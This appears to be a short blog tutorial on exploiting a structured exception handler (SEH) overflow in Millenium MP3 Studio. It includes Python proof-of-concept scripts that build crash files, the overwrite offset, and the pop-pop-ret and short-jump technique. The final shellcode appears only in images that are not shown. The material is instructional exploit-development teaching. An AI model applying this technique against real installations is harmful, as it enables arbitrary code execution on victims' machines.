Blog


SEH Exploit: practical example

This time we'll see in practice a SEH based exploits.
Once again we'll pass the theoretic side that you need to know (see the resources that are excellent).

Here you can download Millenium MP3 Studio as testing software.
If We start a specifically created m3u or mpf file software crashes. Let's try this poc written in python:

#!/usr/bin/python

file = open('key.mpf' , 'w');

buffer = "http://" + "A"*5000

file.write(buffer)
file.close()

image
We can see that SEH and next SEH were overwritten and not directly the EIP.
However, We can be able to control the EIP and execute our shellcode! Let's do it!

Create the pattern with pattern_create inside Kali, then insert in pattern_offset the value found :
image

image

#!/usr/bin/python

file = open('key.mpf' , 'w');

buffer = "http://" + "A"*4105 + "BBBB" + "CCCC"

file.write(buffer)
file.close()

image
Next SEH was overwritten with 42424242 and SEH with 43434343, so let's replace SEH with "pop pop ret" address and next SEH with jumpcode. (jmp short "size")
Let's find this instruction and choose the module without protections:
image

image
Here is the modified poc:
image

Via jmp short (eb 1c) We are able to skip the null byte and successfully execute our shellcode:
image

Here the final poc with shellcode:
image

image

Study hard and have fun :)

Resources:
Corelan: SEH
Corelan: SEH based exploit Example